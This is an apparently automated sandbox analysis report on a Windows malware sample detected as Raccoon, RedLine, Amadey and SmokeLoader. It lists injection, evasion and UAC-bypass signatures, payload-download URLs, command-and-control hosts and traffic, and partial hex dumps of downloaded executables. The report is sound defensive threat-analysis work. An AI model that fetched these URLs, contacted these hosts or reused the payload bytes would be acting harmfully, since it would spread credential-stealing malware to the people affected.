Windows Analysis Report cnv622JnZv.exe

Overview

General Information

Sample Name: cnv622JnZv.exe
Analysis ID: 511932
MD5: 5ae3b69c31fe729ac672ba483280f16d
SHA1: 310d993f9fbe7fb9cf3892220d980e08eb5e6286
SHA256: 033247a6ba1cd0543f27857fb6743e16fdd2990cea1df3dce93e4031c8046d1a
Tags: exeRaccoonStealer
Infos:

Most interesting Screenshot:

Detection

Amadey Raccoon RedLine SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Early bird code injection technique detected
Detected unpacking (overwrites its own PE header)
Yara detected AntiVM3
Yara detected SmokeLoader
Yara detected Amadey bot
System process connects to network (likely due to code injection or exploit)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Yara detected UAC Bypass using CMSTP
DLL reload attack detected
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Adds a directory exclusion to Windows Defender
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Sample uses process hollowing technique
Writes to foreign memory regions
Renames NTDLL to bypass HIPS
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Sigma detected: Powershell Defender Exclusion
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Entry point lies outside standard sections
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Yara detected Raccoon Stealer
Source: Yara match File source: 35.3.152F.exe.48f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.152F.exe.48f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.2.152F.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.2.152F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.460198021.00000000048F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.478734177.0000000000941000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000003.476969852.00000000013F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.593634201.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 152F.exe PID: 1280, type: MEMORYSTR
Antivirus detection for URL or domain
Source: http://sysaheu90.top/game.exe Avira URL Cloud: Label: malware
Source: https://toptelete.top/agrybirdsgamerept Avira URL Cloud: Label: malware
Source: http://telegalive.top/O Avira URL Cloud: Label: malware
Source: http://toptelete.top/agrybirdsgamerept Avira URL Cloud: Label: malware
Source: http://privacytoolzforyou-6000.top/downloads/toolspab2.exe Avira URL Cloud: Label: malware
Source: http://hajezey1.top/ Avira URL Cloud: Label: malware
Source: http://telegalive.top/ Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\977B.exe Avira: detection malicious, Label: HEUR/AGEN.1138925
Source: C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe Avira: detection malicious, Label: HEUR/AGEN.1138925
Multi AV Scanner detection for domain / URL
Source: http://sysaheu90.top/game.exe Virustotal: Detection: 16% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\152F.exe ReversingLabs: Detection: 46%
Source: C:\Users\user\AppData\Local\Temp\66A4.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\8615.exe ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\A557.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\B084.exe ReversingLabs: Detection: 56%
Machine Learning detection for sample
Source: cnv622JnZv.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\152F.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\B084.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\bejhieg Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\977B.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\A557.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\8615.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\jejhieg Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 34.0.977B.exe.400000.11.unpack Avira: Label: TR/AD.Amadey.ezxiu
Source: 34.0.977B.exe.400000.15.unpack Avira: Label: TR/AD.Amadey.ezxiu
Source: 18.0.C5EA.exe.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 18.0.C5EA.exe.400000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 34.0.977B.exe.400000.9.unpack Avira: Label: TR/AD.Amadey.ezxiu
Source: 19.0.jejhieg.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 19.0.jejhieg.400000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 34.0.977B.exe.400000.5.unpack Avira: Label: TR/AD.Amadey.ezxiu
Source: 34.0.977B.exe.400000.7.unpack Avira: Label: TR/AD.Amadey.ezxiu
Source: 19.0.jejhieg.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 19.0.jejhieg.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 34.0.977B.exe.400000.13.unpack Avira: Label: TR/AD.Amadey.ezxiu
Source: 18.0.C5EA.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 18.0.C5EA.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 34.0.977B.exe.400000.17.unpack Avira: Label: TR/AD.Amadey.ezxiu

Exploits:

barindex
Yara detected UAC Bypass using CMSTP
Source: Yara match File source: 00000016.00000003.482381534.0000000006B8B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 66A4.exe PID: 3536, type: MEMORYSTR

Compliance:

barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\152F.exe Unpacked PE file: 35.2.152F.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\152F.exe Unpacked PE file: 35.2.152F.exe.400000.0.unpack
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.5:49826 version: TLS 1.0
Uses 32bit PE files
Source: cnv622JnZv.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\AppData\Local\Temp\8615.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.5:49804 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.5:49808 version: TLS 1.2
Source: Binary string: C:\vojos\fuw.pdb source: 8615.exe, 00000018.00000000.413528464.0000000000417000.00000002.00020000.sdmp
Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: AdvancedRun.exe, 00000019.00000000.418963154.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000001E.00000000.426329937.000000000040C000.00000002.00020000.sdmp
Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: 977B.exe
Source: Binary string: C:\wucalehozojoh\setujupiwe-y.pdb source: C5EA.exe, 00000011.00000000.349456240.0000000000401000.00000020.00020000.sdmp, C5EA.exe, 00000012.00000000.364889434.0000000000401000.00000020.00020000.sdmp
Source: Binary string: C:\zowazaxopomuh-39\t.pdb source: cnv622JnZv.exe, 00000000.00000000.243398633.0000000000401000.00000020.00020000.sdmp, cnv622JnZv.exe, 00000003.00000000.254610819.0000000000401000.00000020.00020000.sdmp, jejhieg, 00000010.00000000.348546236.0000000000401000.00000020.00020000.sdmp, jejhieg, 00000013.00000000.368105637.0000000000401000.00000020.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: 8615.exe, 00000018.00000002.441461960.000000006B451000.00000020.00020000.sdmp
Source: Binary string: wntdll.pdb source: 8615.exe
Source: Binary string: DC:\zowazaxopomuh-39\t.pdb source: cnv622JnZv.exe, 00000000.00000000.243398633.0000000000401000.00000020.00020000.sdmp, cnv622JnZv.exe, 00000003.00000000.254610819.0000000000401000.00000020.00020000.sdmp, jejhieg, 00000010.00000000.348546236.0000000000401000.00000020.00020000.sdmp, jejhieg, 00000013.00000000.368105637.0000000000401000.00000020.00020000.sdmp
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_0041B9B2 FindFirstFileExW, 34_2_0041B9B2

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49843 -> 185.215.113.45:80
Source: Traffic Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.5:49847 -> 91.219.236.97:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: xacokuo8.top
Source: C:\Windows\explorer.exe Network Connect: 216.128.137.31 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: privacytoolzforyou-6000.top
Source: C:\Windows\explorer.exe Domain query: hajezey1.top
Source: C:\Windows\explorer.exe Domain query: sysaheu90.top
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/903575517888925756/6D9E3C88.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/903575519373697084/F83CB811.jpg HTTP/1.1Host: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/903702020781907998/4D0A6361.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/902526114763767818/A623D0D3.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/902526117016109056/AB0F9338.jpg HTTP/1.1Host: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: toptelete.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 91.219.236.97
Source: global traffic HTTP traffic detected: GET //l/f/wJ2RyXwB3dP17SpzKGLv/8868635484462b34cd9494990ed8c03cf2975861 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 91.219.236.97
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Oct 2021 18:10:12 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38Last-Modified: Fri, 29 Oct 2021 18:10:01 GMTETag: "54000-5cf81bc649add"Accept-Ranges: bytesContent-Length: 344064Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 15 19 94 43 74 77 c7 43 74 77 c7 43 74 77 c7 2c 02 dc c7 6e 74 77 c7 2c 02 e9 c7 61 74 77 c7 2c 02 dd c7 3c 74 77 c7 4a 0c e4 c7 44 74 77 c7 43 74 76 c7 3c 74 77 c7 2c 02 d8 c7 42 74 77 c7 2c 02 ed c7 42 74 77 c7 2c 02 ea c7 42 74 77 c7 52 69 63 68 43 74 77 c7 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 36 ca 8e 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 be 03 00 00 c4 70 02 00 00 00 00 40 c3 01 00 00 10 00 00 00 d0 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 c0 74 02 00 04 00 00 31 96 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 c1 03 00 50 00 00 00 00 50 73 02 a8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 73 02 3c 1b 00 00 30 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 bc 03 00 00 10 00 00 00 be 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a4 69 6f 02 00 d0 03 00 00 16 00 00 00 c2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6c 75 66 75 6c 61 63 e5 02 00 00 00 40 73 02 00 04 00 00 00 d8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 3f 00 00 00 50 73 02 00 40 00 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 22 01 00 00 90 73 02 00 24 01 00 00 1c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Oct 2021 18:10:56 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38Last-Modified: Fri, 29 Oct 2021 18:10:02 GMTETag: "92800-5cf81bc6a9a05"Accept-Ranges: bytesContent-Length: 600064Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 15 19 94 43 74 77 c7 43 74 77 c7 43 74 77 c7 2c 02 dc c7 6e 74 77 c7 2c 02 e9 c7 61 74 77 c7 2c 02 dd c7 3c 74 77 c7 4a 0c e4 c7 44 74 77 c7 43 74 76 c7 3c 74 77 c7 2c 02 d8 c7 42 74 77 c7 2c 02 ed c7 42 74 77 c7 2c 02 ea c7 42 74 77 c7 52 69 63 68 43 74 77 c7 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5d 6f 8e 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 a6 07 00 00 c4 70 02 00 00 00 00 c0 aa 05 00 00 10 00 00 00 c0 07 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 b0 78 02 00 04 00 00 d2 54 09 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 14 a9 07 00 50 00 00 00 00 40 77 02 a8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 77 02 38 1b 00 00 30 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 9f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 50 a4 07 00 00 10 00 00 00 a6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a4 69 6f 02 00 c0 07 00 00 16 00 00 00 aa 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 75 6c 6f 66 69 76 e5 02 00 00 00 30 77 02 00 04 00 00 00 c0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 3f 00 00 00 40 77 02 00 40 00 00 00 c4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 22 01 00 00 80 77 02 00 24 01 00 00 04 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 18:11:25 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.5:49826 version: TLS 1.0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xauocndh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 146Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gurxx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 347Host: hajezey1.top
Source: global traffic HTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytoolzforyou-6000.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ktkcvjuue.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 249Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://adlotmsqn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://edkykp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 369Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://koyxalg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 115Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hxdci.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 332Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uixmltkfi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 153Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uqqrnpr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 313Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ihqsjj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 118Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://civbpqln.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 113Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pqobqf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: hajezey1.top
